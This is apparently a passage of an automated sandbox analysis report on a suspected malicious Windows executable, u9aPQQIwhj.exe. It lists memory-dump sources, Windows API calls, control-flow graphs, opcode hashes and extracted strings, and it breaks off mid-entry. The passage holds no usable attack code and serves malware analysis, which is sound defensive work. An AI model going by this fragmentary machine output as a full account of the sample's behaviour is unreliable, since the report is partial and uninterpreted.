                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3081826266
                                                  • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                  • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                                                  • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                  • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\u9aPQQIwhj.exe,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405985
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\u9aPQQIwhj.exe,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405995
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                                                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                                                  APIs
                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloclstrcpy
                                                  • String ID:
                                                  • API String ID: 852173138-0
                                                  • Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                                                  • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                  • Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                                                  • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                  • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                  • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                  • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

                                                  Execution Graph

                                                  Execution Coverage:9.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:28
                                                  Total number of Limit Nodes:3
                                                  execution_graph 40097 39410040 40098 39410082 40097->40098 40100 39410089 40097->40100 40099 394100da CallWindowProcW 40098->40099 40098->40100 40099->40100 40101 38893458 DuplicateHandle 40102 388934ee 40101->40102 40103 38893210 40104 38893256 GetCurrentProcess 40103->40104 40106 388932a8 GetCurrentThread 40104->40106 40107 388932a1 40104->40107 40108 388932de 40106->40108 40109 388932e5 GetCurrentProcess 40106->40109 40107->40106 40108->40109 40111 3889331b 40109->40111 40110 38893343 GetCurrentThreadId 40112 38893374 40110->40112 40111->40110 40113 394121f8 40114 39412220 40113->40114 40117 3941224c 40113->40117 40115 39412229 40114->40115 40118 39411764 40114->40118 40120 3941176f 40118->40120 40119 39412543 40119->40117 40120->40119 40122 39411780 40120->40122 40123 39412578 OleInitialize 40122->40123 40124 394125dc 40123->40124 40124->40119 40125 3889d7f0 40126 3889d858 CreateWindowExW 40125->40126 40128 3889d914 40126->40128

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 393 39043158-39043179 394 3904317b-3904317e 393->394 395 39043184-390431a3 394->395 396 3904391f-39043922 394->396 405 390431a5-390431a8 395->405 406 390431bc-390431c6 395->406 397 39043924-39043943 396->397 398 39043948-3904394a 396->398 397->398 400 39043951-39043954 398->400 401 3904394c 398->401 400->394 402 3904395a-39043963 400->402 401->400 405->406 408 390431aa-390431ba 405->408 410 390431cc-390431db 406->410 408->410 519 390431dd call 39043970 410->519 520 390431dd call 39043978 410->520 412 390431e2-390431e7 413 390431f4-390434d1 412->413 414 390431e9-390431ef 412->414 435 390434d7-39043586 413->435 436 39043911-3904391e 413->436 414->402 445 390435af 435->445 446 39043588-390435ad 435->446 448 390435b8-390435cb 445->448 446->448 450 390435d1-390435f3 448->450 451 390438f8-39043904 448->451 450->451 454 390435f9-39043603 450->454 451->435 452 3904390a 451->452 452->436 454->451 455 39043609-39043614 454->455 455->451 456 3904361a-390436f0 455->456 468 390436f2-390436f4 456->468 469 390436fe-3904372e 456->469 468->469 473 39043730-39043732 469->473 474 3904373c-39043748 469->474 473->474 475 390437a8-390437ac 474->475 476 3904374a-3904374e 474->476 478 390437b2-390437ee 475->478 479 390438e9-390438f2 475->479 476->475 477 39043750-3904377a 476->477 486 3904377c-3904377e 477->486 487 39043788-390437a5 477->487 489 390437f0-390437f2 478->489 490 390437fc-3904380a 478->490 479->451 479->456 486->487 487->475 489->490 493 39043821-3904382c 490->493 494 3904380c-39043817 490->494 498 39043844-39043855 493->498 499 3904382e-39043834 493->499 494->493 497 39043819 494->497 497->493 503 39043857-3904385d 498->503 504 3904386d-39043879 498->504 500 39043836 499->500 501 39043838-3904383a 499->501 500->498 501->498 505 39043861-39043863 503->505 506 3904385f 503->506 508 39043891-390438e2 504->508 509 3904387b-39043881 504->509 505->504 506->504 508->479 510 39043885-39043887 509->510 511 39043883 509->511 510->508 511->508 519->412 520->412
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-2392861976
                                                  • Opcode ID: 1602d41266cc469af1328f587357bf3781dab2b56df1c4daa7ea3df27d84ecf8
                                                  • Instruction ID: 05e02ab5add3ce33c8b40283f252d7ea6fc6479bfe7a0fbc1c495db3f4e6163a
                                                  • Opcode Fuzzy Hash: 1602d41266cc469af1328f587357bf3781dab2b56df1c4daa7ea3df27d84ecf8
                                                  • Instruction Fuzzy Hash: B6323031E1071A8FCB14DF74C99459DF7B6BF89340F509AA9D409AB224EB70AD85CF81
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 538bdda4ae21519b2564e899d37cd542f445f86990c21bf662c6cd8fe77263fd
                                                  • Instruction ID: bac896c7e7a8175aff3d29ccdea6e711cb5350a920d5ae5871766bccd8808f2e
                                                  • Opcode Fuzzy Hash: 538bdda4ae21519b2564e899d37cd542f445f86990c21bf662c6cd8fe77263fd
                                                  • Instruction Fuzzy Hash: 8963F931D10B1ACEDB11EB68C8406A9F7B1FF99300F55D79AE4597B121EB70AAC4CB81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1621 39047e40-39047e5e 1622 39047e60-39047e63 1621->1622 1623 39047e84-39047e87 1622->1623 1624 39047e65-39047e7f 1622->1624 1625 39047e89-39047ea5 1623->1625 1626 39047eaa-39047ead 1623->1626 1624->1623 1625->1626 1628 39047ec4-39047ec7 1626->1628 1629 39047eaf-39047ebd 1626->1629 1630 39047ed4-39047ed6 1628->1630 1631 39047ec9-39047ed3 1628->1631 1637 39047ee6-39047efc 1629->1637 1638 39047ebf 1629->1638 1635 39047edd-39047ee0 1630->1635 1636 39047ed8 1630->1636 1635->1622 1635->1637 1636->1635 1641 39048117-39048121 1637->1641 1642 39047f02-39047f0b 1637->1642 1638->1628 1643 39047f11-39047f2e 1642->1643 1644 39048122-39048157 1642->1644 1651 39048104-39048111 1643->1651 1652 39047f34-39047f5c 1643->1652 1647 39048159-3904815c 1644->1647 1649 39048391-39048394 1647->1649 1650 39048162-39048171 1647->1650 1653 39048396-390483b2 1649->1653 1654 390483b7-390483ba 1649->1654 1662 39048190-390481d4 1650->1662 1663 39048173-3904818e 1650->1663 1651->1641 1651->1642 1652->1651 1678 39047f62-39047f6b 1652->1678 1653->1654 1655 39048465-39048467 1654->1655 1656 390483c0-390483cc 1654->1656 1658 3904846e-39048471 1655->1658 1659 39048469 1655->1659 1664 390483d7-390483d9 1656->1664 1658->1647 1665 39048477-39048480 1658->1665 1659->1658 1674 39048365-3904837a 1662->1674 1675 390481da-390481eb 1662->1675 1663->1662 1668 390483f1-390483f5 1664->1668 1669 390483db-390483e1 1664->1669 1676 390483f7-39048401 1668->1676 1677 39048403 1668->1677 1672 390483e5-390483e7 1669->1672 1673 390483e3 1669->1673 1672->1668 1673->1668 1674->1649 1687 39048350-3904835f 1675->1687 1688 390481f1-3904820e 1675->1688 1681 39048408-3904840a 1676->1681 1677->1681 1678->1644 1682 39047f71-39047f8d 1678->1682 1684 3904840c-3904840f 1681->1684 1685 3904841b-39048454 1681->1685 1690 390480f2-390480fe 1682->1690 1691 39047f93-39047fbd 1682->1691 1684->1665 1685->1650 1703 3904845a-39048464 1685->1703 1687->1674 1687->1675 1688->1687 1699 39048214-3904830a call 39046670 1688->1699 1690->1651 1690->1678 1704 39047fc3-39047feb 1691->1704 1705 390480e8-390480ed 1691->1705 1753 3904830c-39048316 1699->1753 1754 39048318 1699->1754 1704->1705 1712 39047ff1-3904801f 1704->1712 1705->1690 1712->1705 1717 39048025-3904802e 1712->1717 1717->1705 1718 39048034-39048066 1717->1718 1726 39048071-3904808d 1718->1726 1727 39048068-3904806c 1718->1727 1726->1690 1730 3904808f-390480e6 call 39046670 1726->1730 1727->1705 1729 3904806e 1727->1729 1729->1726 1730->1690 1755 3904831d-3904831f 1753->1755 1754->1755 1755->1687 1756 39048321-39048326 1755->1756 1757 39048334 1756->1757 1758 39048328-39048332 1756->1758 1759 39048339-3904833b 1757->1759 1758->1759 1759->1687 1760 3904833d-39048349 1759->1760 1760->1687
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q
                                                  • API String ID: 0-355816377
                                                  • Opcode ID: 818ec7dd42d2b5ec9d9d1dcf10e8cabd4261f737f574d494c1b2d953ef3ea802
                                                  • Instruction ID: b8400a182816c3cd226e520f30470ee8c7f6f7827563d9795609b8efb40789f1
                                                  • Opcode Fuzzy Hash: 818ec7dd42d2b5ec9d9d1dcf10e8cabd4261f737f574d494c1b2d953ef3ea802
                                                  • Instruction Fuzzy Hash: 9E028B34B002059FDB04DB69D99069EB7E2EF84344F148DB9D809AB395DB35ED86CF81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1762 15e360-15e382 1763 15e384-15e3ba 1762->1763 1764 15e3e6-15e3ed 1762->1764 1770 15e3c1-15e3c3 1763->1770 1771 15e3c5-15e3de 1770->1771 1772 15e3ee-15e455 1770->1772 1771->1764 1782 15e457-15e459 1772->1782 1783 15e45e-15e46e 1772->1783 1784 15e6fd-15e704 1782->1784 1785 15e475-15e485 1783->1785 1786 15e470 1783->1786 1788 15e6e4-15e6f2 1785->1788 1789 15e48b-15e499 1785->1789 1786->1784 1792 15e705-15e77e 1788->1792 1794 15e6f4-15e6f8 call 157ad8 1788->1794 1789->1792 1793 15e49f 1789->1793 1793->1792 1795 15e6b4-15e6d6 1793->1795 1796 15e697-15e6b2 call 150350 1793->1796 1797 15e556-15e577 1793->1797 1798 15e530-15e551 1793->1798 1799 15e4bd-15e4de 1793->1799 1800 15e57c-15e59d 1793->1800 1801 15e5fc-15e639 1793->1801 1802 15e63e-15e664 1793->1802 1803 15e6d8-15e6e2 1793->1803 1804 15e4a6-15e4b8 1793->1804 1805 15e4e3-15e505 1793->1805 1806 15e5a2-15e5ca 1793->1806 1807 15e5cf-15e5f7 1793->1807 1808 15e669-15e695 1793->1808 1809 15e50a-15e52b 1793->1809 1794->1784 1795->1784 1796->1784 1797->1784 1798->1784 1799->1784 1800->1784 1801->1784 1802->1784 1803->1784 1804->1784 1805->1784 1806->1784 1807->1784 1808->1784 1809->1784
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xbq$$^q
                                                  • API String ID: 0-1593437937
                                                  • Opcode ID: 41f01b32f92fa3933133d76377a7f6550be017b248b30c0e6f1c5c1cf342e91f
                                                  • Instruction ID: 1cc4601f10668707b9bd57bda2d5fe51a73a86ea1e77f74583187e7d8374d6c4
                                                  • Opcode Fuzzy Hash: 41f01b32f92fa3933133d76377a7f6550be017b248b30c0e6f1c5c1cf342e91f
                                                  • Instruction Fuzzy Hash: 56B1E270B04258CFDB1CAB7C885427E7BA7BFC8740B15852ED466EB398CE349D069792
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7fefda88f6cade096dcd5936551d74997778ce8bf9b8f7c05efcb0b757a79a28
                                                  • Instruction ID: 30e2914d9317dc5f0c9a2354479cfba9681d9180bd634866ac2f382d04f83be7
                                                  • Opcode Fuzzy Hash: 7fefda88f6cade096dcd5936551d74997778ce8bf9b8f7c05efcb0b757a79a28
                                                  • Instruction Fuzzy Hash: 2CA21538A002448FDB24DB68C584B4DB7F2FB49354F5588A9E449EB361DB75EC86CF81
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15b79a1315918d36ee211e8e4c027487494e6bbff5dc780611811846506bb689
                                                  • Instruction ID: 43fb96eb5c1a024b5cdfbe70304ea93dfa447097f1f49390da117b16a282e51d
                                                  • Opcode Fuzzy Hash: 15b79a1315918d36ee211e8e4c027487494e6bbff5dc780611811846506bb689
                                                  • Instruction Fuzzy Hash: 09627B35A002049FDB04EB68C594A9DB7F2EF88354F5489B9E406EB351EB35EC86CF81
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7797d25c3f35fc69f86fe7e02d76138cfa5062266538c0d29aa15c9b22a86968
                                                  • Instruction ID: 27f99378eb62906819e518fb9aa0d23ce5c9f418bf5978246d2c7c22b81504bc
                                                  • Opcode Fuzzy Hash: 7797d25c3f35fc69f86fe7e02d76138cfa5062266538c0d29aa15c9b22a86968
                                                  • Instruction Fuzzy Hash: 48329F34B002159FEB05DB68D981A9EB7F2EB88350F108979E506EB351DB35EC468F91
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb5e4f609bd662d22e3393eb2f13b5ddd9c9ba5e6efe3b4ae56c1df4c56b35a9
                                                  • Instruction ID: 2b936aa4a1630efa94f74476c56ff430fe3466e7841ac0f42275455db6e25796
                                                  • Opcode Fuzzy Hash: fb5e4f609bd662d22e3393eb2f13b5ddd9c9ba5e6efe3b4ae56c1df4c56b35a9
                                                  • Instruction Fuzzy Hash: 0F12B035F002459FEB149BA4C88469EB7F2EF85354F2488B9D44AEB385DE34EC46CB91
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 773a0c85904af830d4b9b19bfc4e3f34010f61614c60b88d7982a21ed3aae351
                                                  • Instruction ID: da4a8185f34503f10899cd853e391c9b44147b51b257ec2a7568a2933f862a8f
                                                  • Opcode Fuzzy Hash: 773a0c85904af830d4b9b19bfc4e3f34010f61614c60b88d7982a21ed3aae351
                                                  • Instruction Fuzzy Hash: 66226274A0024A9FEB14CB68C49179DB7F2EB89350F208D76E445EB391DA35EC85CF92
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cf2e503e5ad4a734dcbfbe49cdff9626866e63874a653b1e98b95c2db65ffcc
                                                  • Instruction ID: 75aba3c128683f88c8994f22a13c2912f5cb4cf14b2f88bee203087a21a5052d
                                                  • Opcode Fuzzy Hash: 5cf2e503e5ad4a734dcbfbe49cdff9626866e63874a653b1e98b95c2db65ffcc
                                                  • Instruction Fuzzy Hash: E4B15270E00209CFDF14CFA9D9957DDBBF2AF88319F148129D865EB254EB749889CB81
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cdb0050ee95a0bdcbfec4188c8bef0c5fa65c127d4de6b1014201b7389c3629a
                                                  • Instruction ID: fe2e7070a98cbe8c617ab2d1f7b8fa1e04983c66ff7c65125aa3a0250d0a76ed
                                                  • Opcode Fuzzy Hash: cdb0050ee95a0bdcbfec4188c8bef0c5fa65c127d4de6b1014201b7389c3629a
                                                  • Instruction Fuzzy Hash: 63918270E00209CFDF14CFA8C9857DDBBF2AF48345F148529E825EB294EB749989CB81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 263 3904ad98-3904adb6 265 3904adb8-3904adbb 263->265 266 3904adbd-3904add9 265->266 267 3904adde-3904ade1 265->267 266->267 268 3904adf5-3904adf8 267->268 269 3904ade3-3904adf0 267->269 271 3904afb5-3904afbe 268->271 272 3904adfe-3904ae01 268->272 269->268 274 3904afc4-3904afce 271->274 275 3904ae03-3904ae0c 271->275 272->275 276 3904ae1b-3904ae1e 272->276 277 3904ae12-3904ae16 275->277 278 3904afcf-3904afd9 275->278 279 3904ae20-3904ae25 276->279 280 3904ae28-3904ae2b 276->280 277->276 288 3904afee-3904aff3 278->288 289 3904afdb-3904afe1 278->289 279->280 282 3904ae3c-3904ae3f 280->282 283 3904ae2d-3904ae31 280->283 286 3904ae41-3904ae4a 282->286 287 3904ae4f-3904ae52 282->287 283->274 285 3904ae37 283->285 285->282 286->287 290 3904ae54-3904ae67 287->290 291 3904ae6c-3904ae6e 287->291 292 3904aff6-3904b006 288->292 289->292 293 3904afe3-3904afed 289->293 290->291 294 3904ae75-3904ae78 291->294 295 3904ae70 291->295 296 3904b008-3904b00b 292->296 293->288 294->265 298 3904ae7e-3904aea2 294->298 295->294 299 3904b00d-3904b017 296->299 300 3904b018-3904b01b 296->300 310 3904afb2 298->310 311 3904aea8-3904aeb7 298->311 302 3904b01d call 3904b2f0 300->302 303 3904b02a-3904b02d 300->303 309 3904b023-3904b025 302->309 304 3904b050-3904b053 303->304 305 3904b02f-3904b04b 303->305 307 3904b055-3904b059 304->307 308 3904b060-3904b063 304->308 305->304 312 3904b069-3904b0a4 307->312 313 3904b05b 307->313 308->312 314 3904b2cc-3904b2ce 308->314 309->303 310->271 322 3904aecf-3904af0a call 39046670 311->322 323 3904aeb9-3904aebf 311->323 324 3904b297-3904b2aa 312->324 325 3904b0aa-3904b0b6 312->325 313->308 316 3904b2d5-3904b2d8 314->316 317 3904b2d0 314->317 316->296 321 3904b2de-3904b2e8 316->321 317->316 342 3904af22-3904af39 322->342 343 3904af0c-3904af12 322->343 326 3904aec1 323->326 327 3904aec3-3904aec5 323->327 328 3904b2ac 324->328 331 3904b0d6-3904b11a 325->331 332 3904b0b8-3904b0d1 325->332 326->322 327->322 333 3904b2ad 328->333 349 3904b136-3904b175 331->349 350 3904b11c-3904b12e 331->350 332->328 333->333 354 3904af51-3904af62 342->354 355 3904af3b-3904af41 342->355 345 3904af14 343->345 346 3904af16-3904af18 343->346 345->342 346->342 356 3904b25c-3904b271 349->356 357 3904b17b-3904b256 call 39046670 349->357 350->349 363 3904af64-3904af6a 354->363 364 3904af7a-3904afab 354->364 358 3904af45-3904af47 355->358 359 3904af43 355->359 356->324 357->356 358->354 359->354 366 3904af6c 363->366 367 3904af6e-3904af70 363->367 364->310 366->364 367->364
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XM$XM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-312705433
                                                  • Opcode ID: dbd358cd2cb3bc1ef2ce6f9de5b5f66ce7bdb75a542a27459008c668b51e7cd3
                                                  • Instruction ID: 6bfeaa71785c5330ea81cb45b63b356bf148aab130eff95f9c2fb349208aed77
                                                  • Opcode Fuzzy Hash: dbd358cd2cb3bc1ef2ce6f9de5b5f66ce7bdb75a542a27459008c668b51e7cd3
                                                  • Instruction Fuzzy Hash: 75E17B34A0020A8FEB15DFA9C58169EB7F2EF88340F208979D419AB355DB35EC46CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-2392861976
                                                  • Opcode ID: b13f565c58ebdeb630af5dcb5fc39f0e1188f851afc3c6720fb7e1b7cdcc8bed
                                                  • Instruction ID: 8a221f1199f4bcf08496149b29334db81472413f5b1cad45abbceec11c66efbd
                                                  • Opcode Fuzzy Hash: b13f565c58ebdeb630af5dcb5fc39f0e1188f851afc3c6720fb7e1b7cdcc8bed
